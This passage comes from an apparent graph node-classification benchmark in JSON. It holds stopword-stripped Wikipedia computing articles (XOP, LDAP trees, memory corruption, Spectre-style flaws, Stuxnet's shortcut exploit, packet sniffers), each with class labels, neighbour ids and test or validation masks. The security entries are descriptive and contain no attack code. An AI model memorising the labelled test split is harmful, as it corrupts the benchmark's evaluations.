      4872,
      5645,
      398,
      7058,
      10260,
      2719,
      4767,
      2463,
      2850,
      7712,
      9122,
      1322,
      2094,
      11183,
      1329,
      6705,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      11080,
      2764,
      7247,
      9551,
      7122,
      7132,
      2525,
      9057,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651,
      11130
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9428,
    "label": 3,
    "text": "XOP_instruction_set:xop instruction set xop extended operations instruction set announced amd may 1 2009 extension 128-bit sse core instructions x86 amd64 instruction set bulldozer processor core released october 12 2011 however amd removed support xop zen microarchitecture onward xop instruction set contains several different types vector instructions since originally intended major upgrade sse instructions integer instructions also contains floating point permutation floating point fraction extraction instructions see index list instruction types xop revised subset originally intended sse5 changed similar overlapping avx parts overlapped avx removed moved separate standards fma4 floating-point vector multiply–accumulate cvt16 half-precision floating-point conversion implemented f16c intel sse5 instructions equivalent similar instructions avx fma4 instruction sets announced intel changed use coding proposed intel integer instructions without equivalents avx classified xop extension xop instructions opcode byte 8f hexadecimal otherwise almost identical coding scheme avx 3-byte vex prefix commentators seen evidence intel allowed amd use part large vex coding space amd forced use different codes order avoid using code combination intel might possibly using development pipeline something else xop coding scheme close vex scheme technically possible without risking amd codes overlap future intel codes inference speculative since public information available negotiations two companies issue use 8f byte requires m-bits see vex coding scheme value larger equal 8 order avoid overlap existing instructions c4 byte used vex scheme restriction may prevent use m-bits purposes future xop scheme vex scheme another possible problem pp bits value 00 xop scheme value 01 vex scheme instructions legacy equivalent may complicate use pp bits purposes future similar compatibility issue difference fma3 fma4 instruction sets intel initially proposed fma4 avx/fma specification version 3 supersede 3-operand fma proposed amd sse5 amd adopted fma4 intel canceled fma4 support reverted fma3 avx/fma specification version 5 see fma history march 2015 amd explicitly revealed description patch gnu binutils package zen third-generation x86-64 architecture first iteration znver1 – zen version 1 support tbm fma4 xop lwp instructions developed specifically bulldozer family micro-architectures integer version fma instruction set four operand instructions similar fma4 operate signed integers horizontal addition instructions adds adjacent values input vector output size instructions describes wide horizontal addition performed instance horizontal byte word adds two bytes time returns result vector words byte quadword adds eight bytes together time returns result vector quadwords six additional horizontal addition subtraction instructions found ssse3 operate two input vectors two two operations set vector compare instructions take immediate extra argument immediate controls kind comparison performed eight comparison possible instruction vectors compared comparisons evaluate true set corresponding bits destination 1 false comparisons sets bits 0 result used directly vpcmov instruction vectorized conditional move vpcmov works bitwise variant blend instructions sse4 bit selector 1 selects bit first source 0 selects second source used together xop vector comparison instructions used implement vectorized ternary move second input destination conditional move cmov shift instructions differ sse2 shift unit different amount using vector register interpreted packed signed integers sign indicates direction shift rotate positive values causing left shift negative right shift intel specified different incompatible set variable vector shift instructions avx2 vpperm single instruction combines ssse3 instruction palignr pshufb adds compare altivec instruction vperm takes three registers input first two source registers third selector register byte selector selects one bytes one two input registers output selector also apply effects selected bytes setting 0 reverse bit order repeating signicating bit effects input addition inverted vpermil2pd vpermil2ps instructions two source versions vpermilpd vpermilps instructions avx means like vpperm select output fields two inputs instructions extracts fractional part floating point part would lost conversion integer",
    "neighbors": [
      9092,
      2821,
      1798,
      4491,
      6924,
      4237,
      5645,
      10383,
      6038,
      9369,
      7963,
      9500,
      2719,
      1915,
      2088,
      2094,
      9391,
      8120,
      8506,
      1085,
      8125,
      8126,
      833,
      7234,
      9541,
      3142,
      5326,
      977,
      2514,
      5844,
      8795,
      2655,
      1122,
      7783,
      10985,
      9964,
      5358,
      9582,
      8944,
      499,
      1399,
      9976,
      4603,
      10620,
      3070
    ],
    "mask": "Test"
  },
  {
    "node_id": 9429,
    "label": 5,
    "text": "Directory_information_tree:directory information tree directory information tree dit data represented hierarchical tree-like structure consisting distinguished names dns directory service entries x.500 protocols lightweight directory access protocol ldap use directory information trees fundamental data structure typically x.500 ldap deployment single organization directory information tree consists two parts top level directory information tree frequently represent political geographic divisions original assumption x.500 directory servers would interconnected form single global namespace entries top level tree corresponded countries identified iso 3166 two letter country code entries subordinate country entry would correspond states provinces national organizations naming system particular country determined country national standards body telecommunications provider limitation original directory information tree structure assumption applications searching entry particular organization would navigate directory tree first browsing particular country organization based region organization based locate entry organization search within organization entry question desire support searching broadly individual person particulars person location organization known led experiments directory deployment interconnection common indexing protocol today ldap deployments particular active directory deployments interconnected single global naming space use national country codes basis naming instead deployments follow directory structure top level mirrors domain name system described rfc 2247 example entry organization domain name example.com would distinguished name dc=example dc=com entries organization directory information tree would contain distinguished name suffix elements organization represented directory e.g. people roles devices dit may modeled variety techniques determining factors include early deployments x.500 within corporations institutions entries representing employees organizations often used dit structure mirrored organizational structure organizational unit entries corresponding departments divisions organization relative distinguished names entries employees often formed common names individual employees example dn early x.500/ldap deployment might cn=joe bloggs ou=marketing ou=operations o=example corporation st=ca c=us disadvantage approach organizational structure changed employees change legal name require moving renaming entries directory adds complexity overhead also upset applications designed deal gracefully moves today many large deployments x.500 ldap use single flat namespace entries choose name entries individuals based relative distinguished name organizationally-assigned identifier username employee number today dn might resemble uid=00003 ou=people dc=example dc=com advantage structure entries need moved even employees change name transferred different departments changes effected attribute modification applications may using dn unique identifier e.g database need touched",
    "neighbors": [
      929,
      2887,
      6710,
      6651,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 9430,
    "label": 2,
    "text": "Core_Animation:core animation core animation graphics compositing framework used macos mac os x leopard later ios watchos tvos produce animated user interfaces core animation provides way developers produce animated user interfaces via implicit animation model well explicit model developer specifies original final states object core animation handles interpolation allows animated interfaces created relative ease specific code animation required developer core animation animate visual element provides unified way accessing core image core video quartz technologies core animation rendering accelerated graphics processor gpu animated sequences execute thread independent main run loop allowing application processing occur animation progress way application performance affected animations stopped reversed retargeted progress core animation first appeared mac os x leopard actually first emerged iphone software team shown publicly first time august 7 2006 wwdc 2006 macworld expo 2007 apple announced iphone runs specially adapted version os x uses core animation",
    "neighbors": [
      10755,
      9732,
      4615,
      1549,
      5647,
      7697,
      1042,
      11289,
      6186,
      4139,
      6700,
      4657,
      1074,
      8754,
      9784,
      8253,
      576,
      9802,
      8783,
      5713,
      4180,
      3670,
      1623,
      3672,
      4184,
      10838,
      2141,
      4702,
      3681,
      9826,
      2149,
      8806,
      3691,
      8303,
      2673,
      6771,
      2676,
      6264,
      7292,
      2686,
      6783,
      7806,
      9343,
      10878,
      3719,
      10888,
      11402,
      1686,
      7318,
      5784,
      1177,
      4251,
      3228,
      2207,
      1699,
      11430,
      171,
      5292,
      8877,
      1710,
      2735,
      3248,
      3766,
      2232,
      4283,
      3772,
      7869,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      3286,
      3289,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      2288,
      7928,
      8441,
      7420,
      7422,
      11521,
      2819,
      1796,
      1290,
      3338,
      9999,
      784,
      10512,
      4888,
      5912,
      11037,
      10023,
      811,
      3371,
      4399,
      10036,
      7991,
      9529,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      1348,
      4933,
      838,
      7496,
      9035,
      1878,
      4957,
      6495,
      9063,
      4457,
      10602,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      9100,
      9109,
      3483,
      1439,
      2979,
      9123,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      8662,
      9174,
      3035,
      4571,
      7133,
      3038,
      9182,
      4068,
      5093,
      9700,
      487,
      2023,
      8170,
      10221,
      7154,
      5619,
      11257,
      7163,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 9431,
    "label": 9,
    "text": "ASCEND:ascend ascend open source mathematical modelling chemical process modelling system developed carnegie mellon university since late 1978 ascend acronym stands advanced system computations engineering design main uses field chemical process modelling although capabilities general ascend includes nonlinear algebraic solvers differential/algebraic equation solvers nonlinear optimization modelling multi-region 'conditional models matrix operations supported efficient sparse matrix solver called mtx ascend differs earlier modelling systems separates solving strategy model building domain experts people writing models computational engineers people writing solver code work separately developing ascend together number early modelling tools architecture helped inspire newer languages modelica recognised flexible use variables parameters always treats solvable desired software remains active open-source software project part google summer code programme 2009 2010 2011 2012 2013 python software foundation accepted 2015 programme well",
    "neighbors": [
      9376,
      7593,
      8554,
      587,
      6797,
      7983,
      8113,
      823,
      9915,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9432,
    "label": 4,
    "text": "Memory_corruption:memory corruption memory corruption occurs computer program contents memory location modified due programmatic behavior exceeds intention original programmer program/language constructs termed violating memory safety likely cause memory corruption programming error corrupted memory contents used later program leads either program crash strange bizarre program behavior nearly 10 application crashes windows systems due heap corruption modern programming languages like c c++ powerful features explicit memory management pointer arithmetic features designed developing efficient applications system software however using features incorrectly may lead memory corruption errors memory corruption one intractable class programming errors two reasons memory corruption errors broadly classified four categories many memory debuggers purify valgrind insure++ parasoft c/c++test addresssanitizer available detect memory corruption errors",
    "neighbors": [
      1409,
      7173,
      4112,
      4240,
      3871,
      1952,
      161,
      1954,
      8609,
      7462,
      9854,
      10412,
      814,
      815,
      11446,
      5176,
      2620,
      1474,
      6477,
      10703,
      8531,
      3413,
      8280,
      7421,
      3553,
      11106,
      8037,
      10470,
      3048,
      5872,
      9714,
      5365,
      10492,
      2045,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9433,
    "label": 4,
    "text": "The_Hacker_Crackdown:hacker crackdown hacker crackdown law disorder electronic frontier work nonfiction bruce sterling first published 1992 book discusses watershed events hacker subculture early 1990s notable topic covered operation sundevil events surrounding 1987–1990 war legion doom network raid steve jackson games trial knight lightning one original journalists phrack subsequent formation electronic frontier foundation book also profiles likes emmanuel goldstein publisher former assistant attorney general arizona gail thackeray fletc instructor carlton fitzpatrick mitch kapor john perry barlow 1994 sterling released book internet new afterword though published 1992 released freeware electronic book 1994 book offers unique colorful portrait nature cyberspace early 1990s nature computer crime time events sterling discusses occur cusp mass popularity internet arguably achieved critical mass late 1994 also encapsulates moment information age revolution cyberspace morphed realm telephone modems bbs internet world wide web cory doctorow voiced unabridged podcast book said inspired politically artistically socially",
    "neighbors": [
      1121,
      8321,
      4435,
      2261,
      119,
      4956
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9434,
    "label": 2,
    "text": "Microsoft_XNA:microsoft xna microsoft xna recursive acronym xna acronymed freeware set tools managed runtime environment provided microsoft facilitates video game development management xna based .net framework versions run windows nt windows phone xbox 360 xna content built xna game studio played using xna framework windows games published native executables xbox 360 windows phone zune many respects xna thought .net analog microsoft better known game development system directx aimed developers primarily interested writing lightweight games run variety microsoft platforms xna basic platform xbox live indie games xna toolset announced march 24 2004 game developers conference san jose california first community technology preview xna build released march 14 2006 xna game studio 2.0 released december 2007 followed xna game studio 3.0 october 30 2008 xna game studio 4.0 released september 16 2010 along windows phone development tools according email sent 31 january 2013 xna longer developed supported new metro interface layers windows 8 windows rt platform open source cross platform version microsoft xna 4 application programming interface called monogame developed crossplatform reimplementation xna api called fna exists well microsoft xna framework based native implementation .net compact framework 2.0 xbox 360 development .net framework 2.0 windows includes extensive set class libraries specific game development promote maximum code reuse across target platforms framework runs version common language runtime optimized gaming provide managed execution environment runtime available windows xp windows vista windows 7 windows phone xbox 360 since xna games written runtime run platform supports xna framework minimal modification games run framework technically written .net-compliant language c xna game studio express ide versions visual studio 2008 2010 xna 4.0 officially supported support visual basic .net added 2011 xna framework encapsulates low-level technological details involved coding game making sure framework takes care difference platforms games ported one compatible platform another thereby allowing game developers focus content gaming experience xna framework integrates number tools cross-platform audio creation tool xact aid content creation xna framework provides support 2d 3d game creation allows use xbox 360 controllers vibrations xna framework games target xbox 360 platform could distributed members microsoft xna creator club/app hub carried 99/year subscription fee desktop applications distributed free charge microsoft current licensing xna build set game asset pipeline management tools help defining maintaining debugging optimizing game asset pipeline individual game development efforts game asset pipeline describes process game content textures 3d models modified form suitable use gaming engine xna build helps identify pipeline dependencies also provides api access enable processing dependency data dependency data analyzed help reduce size game finding content actually used example xna build analysis revealed 40 textures shipped mechcommander 2 unused could omitted xna game studio programming environment development games five revisions released far 2015 new versions developed xna game studio express first version released august 30 2006 intended students hobbyists independent homebrew game developers available free download express provides basic starter kits rapid development specific genres games platform games real-time strategy first-person shooters developers could create windows games free xna framework run games xbox 360 pay annual fee us 99 four-month fee us 49 admission microsoft xna creator club update xna developers could compile xbox 360 binaries share microsoft xna creator club members xna game studio 2.0 released december 13 2007 xna game studio 2.0 features ability used versions visual studio 2005 including free visual c 2005 express edition networking api using xbox live windows xbox 360 better device handling xna game studio 3.0 visual studio 2008 free visual c 2008 express edition allows production games targeting zune platform adds xbox live community support released october 30 2008 supported c 3.0 linq versions visual studio 2008 xna game studio 4.0 released september 16 2010 added support windows phone platform including 3d hardware acceleration framework hardware profiles configurable effects built-in state objects graphics device scalars orientation cross-platform multi-touch input microphone input buffered audio playback visual studio 2010 integration xna game studio 4.0 refresh released 6 october 2011 added support windows phone 7.5 mango visual basic xna framework content pipeline set tools allows visual studio xna studio act key design point around organizing consuming 3d content formerly known xna game studio professional xdk extensions add-on xna game studio requires microsoft xbox 360 development kit available licensed xbox developers extensions include additional managed apis achievements leaderboards features reserved licensed game titles titles developed using xdk extensions include winners microsoft dream.build.play competition among others heavily publicized microsoft xna framework 2.0 eula specifically prohibits distribution commercial networked games connect xbox live and/or games windows live absence specific agreement signed developer microsoft means xna game studio still used develop commercial games programs windows platform although microsoft networking support code xbox/windows live used self-developed network code still used inside developer xna project games created using xna game studio may distributed via windows phone marketplace formerly via xbox live indie games software may also used create commercial games target windows dream build play annual global 75,000 microsoft contest promoting microsoft xna eventually xbox live indie games although predated contest first announced 2006 first opened january 2007 many winners notable developers indie game community xbox 360 games written xna game studio could submitted app hub premium membership required us 99/year games submitted app hub subjected peer review creators game passed review would listed xbox live marketplace creators could set price 80 240 400 points game creator paid 70 total revenue game sales baseline microsoft originally planned take additional percentage revenue provided additional marketing game policy rescinded march 2009 leaving flat rate intact regardless promotion microsoft also distributed free year premium app hub subscription educational establishments dreamspark program msdnaa accounts allowed students develop games xbox 360 developers still needed premium xbox live account submit game marketplace project called mono.xna formed port xna open source cross-platform mono framework codebase mono.xna silversprite new project called monogame formed port xna several mobile devices version 3.0.1 released march 3 2013 support stable ios android including ouya macos linux metro windows 8 windows rt windows phone 8 well playstation mobile 2d playstation mobile 3d raspberry pi development currently progress fna game porter ethan lee full-featured open source reimplementation xna forked monogame used many games seen goal fna preserve xna game library reimplementing xna open source project called grommet contains limited port embedded devices using .net micro framework project called anx available implements version xna using sharpdx stack support linux macos playstation vita progress well using anx developers able write games using code similar xna still considered metro application windows 8",
    "neighbors": [
      10243,
      4624,
      10769,
      9234,
      1043,
      2589,
      1055,
      2083,
      8227,
      1577,
      2603,
      4143,
      9263,
      11316,
      1077,
      6709,
      8246,
      8771,
      8262,
      4174,
      4178,
      83,
      9812,
      9813,
      4182,
      10841,
      603,
      608,
      2145,
      5743,
      8303,
      8304,
      1656,
      9848,
      5754,
      1148,
      9340,
      5761,
      1666,
      9348,
      5765,
      10886,
      2183,
      4231,
      5259,
      653,
      6797,
      10388,
      10900,
      10902,
      11414,
      3224,
      4771,
      7846,
      10414,
      7857,
      8391,
      214,
      4822,
      9943,
      2783,
      736,
      4321,
      6370,
      740,
      4836,
      3303,
      9448,
      1770,
      10986,
      11498,
      3821,
      10991,
      10480,
      2804,
      4853,
      6927,
      8976,
      9491,
      11030,
      5401,
      5913,
      11546,
      4384,
      7456,
      2854,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      823,
      1849,
      315,
      5952,
      1347,
      1348,
      9033,
      844,
      847,
      3413,
      342,
      1366,
      10079,
      11616,
      2401,
      9579,
      2943,
      10624,
      9609,
      9612,
      7064,
      9114,
      3997,
      10654,
      8607,
      11683,
      9128,
      4010,
      8618,
      10157,
      430,
      6584,
      2493,
      4550,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      9205,
      10229,
      9726,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 9435,
    "label": 4,
    "text": "Transient_execution_CPU_vulnerabilities:transient execution cpu vulnerabilities transient execution cpu vulnerabilities vulnerabilities computer system speculative execution optimization implemented microprocessor exploited leak secret data unauthorized party classic example spectre since january 2018 many different vulnerabilities identified modern computers highly parallel devices composed components different performance characteristics operation branch yet performed earlier slow operation memory read yet completed microprocessor may attempt predict result earlier operation execute later operation speculatively acting prediction correct prediction may based recent behavior system earlier slower operation completes microprocessor determines whether prediction correct incorrect correct execution proceeds uninterrupted incorrect microprocessor rolls back speculatively executed operations repeats original instruction real result slow operation terms directly visible behavior computer speculatively executed code never happened however speculative execution may affect state certain components microprocessor cache effect may discovered careful monitoring timing subsequent operations attacker arrange speculatively executed code may directly written attacker may suitable gadget found targeted system operates secret data unauthorized access different effect cache different values secret data may able discover value secret data starting 2017 multiple examples vulnerabilities identified publication starting early 2018 hardware mitigations impose close zero performance loss firmware and/or os mitigations might incur quite significant performance loss depending workload 8th generation coffee lake architecture table also applies wide range previously released intel cpus limited architectures based intel core pentium 4 intel atom starting silvermont vulnerabilities associated cpu speculative execution",
    "neighbors": [
      1024,
      5636,
      4108,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      1103,
      4703,
      8288,
      8292,
      8815,
      1140,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      2764,
      3789,
      4304,
      4314,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      5883,
      2815,
      3843,
      10502,
      10003,
      2339,
      4389,
      297,
      2857,
      8489,
      11052,
      9518,
      7983,
      1337,
      5444,
      6484,
      857,
      1882,
      7515,
      3956,
      9092,
      11152,
      10132,
      9111,
      1440,
      5024,
      5028,
      5541,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      1998,
      7639,
      8664,
      1504,
      9186,
      2542,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 9436,
    "label": 2,
    "text": "Advanced_Comprehensive_Operating_System:advanced comprehensive operating system advanced comprehensive operating system acos family mainframe computer operating systems developed nec japanese market consists three systems based general comprehensive operating system family developed general electric honeywell bull two systems acos-2 based gcos 4 acos-4 based gcos 7 still sold although acos-4 active development acos-6 based gcos 8 obsolete high-end mainframe platform ceased active development early 2000s late september 2012 nec announced return ia-64 previous noah line proprietary mainframe processors acos-4 produced quad-core variant 40 nm called noah-6 acos-2 runs intel xeon servers",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      5523,
      6675,
      7187,
      9366,
      11153,
      6296,
      25,
      10776,
      11539,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      8355,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      4423,
      8136,
      9932,
      11667,
      5840,
      5457,
      11601,
      7382,
      8410,
      10333,
      7134,
      10590,
      97,
      1253,
      8551,
      8298,
      6128,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 9437,
    "label": 6,
    "text": "Dokan_Library:dokan library dokan library software interface windows brings ability create virtual file system achieved running file system code user space dokan kernel driver translates request windows kernel offers compatibility fuse file system using wrapper built cygwin mingw dokan free software originally released terms lgpl mit dokan library project originally created maintained hiroki asakawa 2007 2011 maintained 2011 2014 community different fork since 2014 project actively maintained adrien j. maxime c. fork dokany code signed company islog dokan particularly useful writing virtual file system without requiring windows kernel knowledge gives ability mount virtual hard drive contains whatever developer wants show absolutely virtual using memory like ram disk show remote data like ftp ssh samba databases local storage listed read written deleted",
    "neighbors": [
      10016,
      11584,
      3235,
      5380,
      7364,
      3462,
      10341,
      6797,
      7983,
      8115,
      2901,
      11221,
      8410,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9438,
    "label": 2,
    "text": "Multiseat_configuration:multiseat configuration multiseat multi-station multiterminal configuration single computer supports multiple independent local users time seat consists hardware devices assigned specific workplace one user sits interacts computer consists least one graphics device graphics card output e.g hdmi/vga/displayport port attached monitor/video projector output keyboard mouse input also include video cameras sound cards since 1960s computers shared users especially early days computing computers extremely expensive usual paradigm central mainframe computer connected numerous terminals advent personal computing paradigm largely replaced personal computers one computer per user multiseat setups return multiuser paradigm based around pc supports number zero-clients usually consisting terminal per user screen keyboard mouse multiseat setups great schools libraries family computers situations multiseat also cost-effective necessary buy separate motherboards microprocessors ram hard disks components user example buying one high speed cpu usually costs less buying several slower cpus 1970s commonplace connect multiple computer terminals single mainframe computer even graphical terminals early terminals connected rs-232 type serial connections either directly modems advent internet protocol based networking became possible multiple users log host using telnet – graphic environment – x window system server systems would retain physically secure root console system administration direct access host machine support multiple consoles pc running x interface implemented 2001 miguel freitas using linux operating system x11 graphical system time maintained xfree86 done using patch display server execute several instances x time one captures specific mouse keyboard events graphical content method received name multiseat multiterminal 2002 canadian company userful corporation released userful multiplier multiseat linux software solution enables 10 users simultaneously share one computer earlier worked kernel-based approach multi-station platform computer abandoned idea due problem multiple video card support solutions appeared 2003 svetoslav slavtchev aivils stoss james simmons worked evdev faketty approach modifying kernel linux letting one user independently use machine time linux console project also proposed idea use multiple independent consoles multiple independent keyboards mice project called backstreet ruby backstreet ruby kernel patch linux kernel back port linux-2.4 ruby kernel tree aim linux console developers enhance reorganize input console framebuffer subsystems linux kernel work independent allow multi-desktop operation backstreet ruby idea never finished 2005 c3sl team center scientific computing free software federal university parana brazil created solution based nested display servers xnest xephyr solution nested display server runs screen host display server e.g xorg modification nested servers let one exclusively acquire mouse keyboard 2008 c3sl group released multiseat display manager mdm ease process installation configuration multiseat box group also 2008 conceived live-cd test purposes automatic multiseat usb docking stations feature fedora 17 monitor need connected graphics output video card example make four-head four users would require four monitors four keyboards four mice two dual one quad output video card usb keyboards mice typically recommended instead ps/2 connections connected usb hub additional devices peripherals cameras flash storage drives card readers touch screens could also assigned seat alternative multiple physical video cards connections displaylink usb vt system linux kernel dates back 1993 understand concept multiple seats kmscon systemd-consoled different solutions set multiseat others constantly developed x.org foundation maintains wiki page latest news concerning solutions currently pointed solutions x.org wiki solutions using either multiple xephyr servers deprecated evdev support host xorg run several instances xorg using multiple video devices quite easy configure popular distributions ubuntu provide multiseat environments documented ubuntu multiseatx wiki page multi-seat display manager automseat tool open source tool helps automatize process installation configuration users want try multiseat encouraged try tool avoid old hard way set howtos stated foundation wiki page hand mdm suffers lack updates releases beyond initial announcement another open source tool aims help simplify creation multiseat mainly ubuntu distribution bicefalo wizard userful offers commercially supported multiseat linux solution called userful multiplier enables 10 users simultaneously share one computer works graphics cards supported x.org/xfree86 well usb multiseat devices available 64-bit 32-bit packages rpm deb formats tested major distributions including debian fedora mandriva linux sled suse ubuntu free two-user version userful multiplier software personal trial use available website windows 2000 xp vista operating systems several commercial products implement multiseat configurations two seats operating system designed specifically multiseat setups entitled windows multipoint server announced february 24 2010 uses remote desktop terminal services technologies windows server 2008 r2 provide multiseat functionality functionality incorporated windows server proper windows server 2016 new server role entitled multipoint services server role removed windows server 2019 owing microsoft ceasing development service 2018 instead relying operating system support multiseat configuration hypervisor configured run multiple virtual machines configured interface one connected seat i/o virtualization methods input devices attached virtual machines usb redirection entire gpus attached intel vt-d youtube channel linustechtips demonstrated virtualization-based 2-seat 7-seat systems unraid host operating system seat exclusive control one windows guest operating systems running host dedicated high-end graphics card guest takes full advantage via use vt-d making system capable hosting demanding video game sessions full quality simultaneously seats february 2009 brazil ministry education committed deploy 350,000 linux-based multiseat computing stations 45,000 rural urban schools across country chosen companies implement project canadian multiseat linux software company userful corporation brazilian partner thinnetworks one multiterminal successful cases happening paraná digital project creating multiterminal laboratories 2000 public schools state paraná brazil 1.5 million users benefit 40,000 terminals project finished laboratories four-head multiterminals running debian cost hardware 50 less normal price absolutely cost software project developer c3sl center scientific computing free software since 2008 electrical computer engineering students michigan state university installed multiterminal systems internet access three schools mto wa mbu tanzania purpose project study impact computer systems internet access education system afford educational resources books computer systems run ubuntu 8.04 32-bit utilize open source multiseat display manager created c3sl research eventually used present government officials third world countries effort showcase positive impact cost-effective computing systems schools project sponsored george vickie rock dow chemical company",
    "neighbors": [
      3729,
      7188,
      11031,
      4505,
      3873,
      2345,
      823,
      10051,
      10436,
      11075,
      4316,
      9054,
      9438,
      5472,
      1121,
      9057,
      2399,
      11112,
      7151,
      1786,
      5243,
      1406,
      11135
    ],
    "mask": "Test"
  },
  {
    "node_id": 9439,
    "label": 4,
    "text": "CPLINK:cplink cplink win32/cpllnk.a names microsoft windows shortcut icon vulnerability discovered june 2010 patched 2 august affected windows operating systems vulnerability exploitable windows application display shortcut icons windows explorer browses folder containing malicious shortcut exploit triggered without user interaction regardless shortcut file located june 2010 virusblokada reported detection zero-day attack malware called stuxnet exploited vulnerability install rootkit snooped siemens scada systems wincc pcs 7 according symantec first worm designed reprogram industrial systems spy",
    "neighbors": [
      9569,
      3843,
      5636,
      9055,
      9791
    ],
    "mask": "Test"
  },
  {
    "node_id": 9440,
    "label": 4,
    "text": "Packet_analyzer:packet analyzer packet analyzer also known packet sniffer computer program piece computer hardware packet capture appliance intercept log traffic passes digital network part network packet capture process intercepting logging traffic data streams flow across network sniffer captures packet needed decodes packet raw data showing values various fields packet analyzes content according appropriate rfc specifications packet analyzer used intercepting traffic wireless networks known wireless analyzer wifi analyzer packet analyzer also referred network analyzer protocol analyzer though terms also meanings wired shared medias networks ethernet token ring fddi networks depending network structure hub switch may possible capture traffic network single machine network modern networks traffic captured using network switch so-called monitoring port mirrors packets pass designated ports switch network tap even reliable solution use monitoring port since taps less likely drop packets high traffic load wireless lans traffic captured one channel time using multiple adapters several channels simultaneously wired broadcast wireless lans capture unicast traffic machines network adapter capturing traffic must promiscuous mode wireless lans even adapter promiscuous mode packets service set adapter configured usually ignored see packets adapter must monitor mode special provisions required capture multicast traffic multicast group packet analyzer already monitoring broadcast traffic traffic captured either entire contents packets recorded headers recorded recording headers reduces storage requirements avoids legal issues yet often provides sufficient information diagnose problems captured information decoded raw digital form human-readable format lets users easily review exchanged information protocol analyzers vary abilities display analyze data protocol analyzers also generate traffic thus act reference device act protocol testers testers generate protocol-correct traffic functional testing may also ability deliberately introduce errors test dut ability handle errors protocol analyzers also hardware-based either probe format increasingly common combined disk array devices record packets slice packet disk array allows historical forensic analysis packets without users recreate fault packet sniffers packet capture used fulfill warrant law enforcement agency wiretap network traffic generated individual internet service providers voip providers united states must comply communications assistance law enforcement act regulations using packet capture storage telecommunications carriers provide legally required secure separate access targeted network traffic able use device internal security purposes collecting data carrier system without warrant illegal due laws interception using end-to-end encryption communications kept confidential telecommunication carriers legal authorities",
    "neighbors": [
      2818,
      7426,
      2569,
      5387,
      8978,
      7828,
      7703,
      5657,
      7961,
      10905,
      2205,
      3486,
      6177,
      10788,
      7590,
      8998,
      1064,
      9640,
      9259,
      1580,
      3629,
      2222,
      6013,
      10924,
      10417,
      3637,
      7989,
      1337,
      8121,
      10173,
      9791,
      7364,
      4552,
      6345,
      842,
      9160,
      9545,
      461,
      10952,
      10705,
      4435,
      9939,
      6997,
      2006,
      7895,
      11224,
      8922,
      4956,
      2783,
      5986,
      4580,
      10341,
      10343,
      5608,
      11112,
      10349,
      2292,
      4085,
      5749,
      381,
      2430
    ],
    "mask": "Test"
  },
  {
    "node_id": 9441,
    "label": 7,
    "text": "Remote_procedure_call:remote procedure call distributed computing remote procedure call rpc computer program causes procedure subroutine execute different address space commonly another computer shared network coded normal local procedure call without programmer explicitly coding details remote interaction programmer writes essentially code whether subroutine local executing program remote form client–server interaction caller client executor server typically implemented via request–response message-passing system object-oriented programming paradigm rpc calls represented remote method invocation rmi rpc model implies level location transparency namely calling procedures largely whether local remote usually identical local calls distinguished remote calls remote calls usually orders magnitude slower less reliable local calls distinguishing important rpcs form inter-process communication ipc different processes different address spaces host machine distinct virtual address spaces even though physical address space different hosts physical address space different many different often incompatible technologies used implement concept response–request protocols date early distributed computing late 1960s theoretical proposals remote procedure calls model network operations date 1970s practical implementations date early 1980s bruce jay nelson generally credited coining term remote procedure call 1981 remote procedure calls used modern operating systems trace roots back rc 4000 multiprogramming system used request-response communication protocol process synchronization idea treating network operations remote procedure calls goes back least 1970s early arpanet documents 1978 per brinch hansen proposed distributed processes language distributed computing based external requests consisting procedure calls processes one earliest practical implementations 1982 brian randell colleagues newcastle connection unix machines soon followed lupine andrew birrell bruce nelson cedar environment xerox parc lupine automatically generated stubs providing type-safe bindings used efficient protocol communication one first business uses rpc xerox name courier 1981 first popular implementation rpc unix sun rpc called onc rpc used basis network file system nfs 1990s popularity object-oriented programming alternative model remote method invocation rmi widely implemented common object request broker architecture corba 1991 java remote method invocation rmis turn fell popularity rise internet particularly 2000s rpc request–response protocol rpc initiated client sends request message known remote server execute specified procedure supplied parameters remote server sends response client application continues process server processing call client blocked waits server finished processing resuming execution unless client sends asynchronous request server xmlhttprequest many variations subtleties various implementations resulting variety different incompatible rpc protocols important difference remote procedure calls local calls remote calls fail unpredictable network problems also callers generally must deal failures without knowing whether remote procedure actually invoked idempotent procedures additional effects called easily handled enough difficulties remain code call remote procedures often confined carefully written low-level subsystems let different clients access servers number standardized rpc systems created use interface description language idl let various platforms call rpc idl files used generate code interface client servers notable rpc implementations analogues include",
    "neighbors": [
      11269,
      9225,
      9744,
      1555,
      7187,
      1050,
      545,
      6694,
      11303,
      5677,
      8751,
      58,
      11323,
      5188,
      11332,
      2120,
      4688,
      7261,
      4201,
      2160,
      8312,
      5754,
      8320,
      1676,
      6799,
      11413,
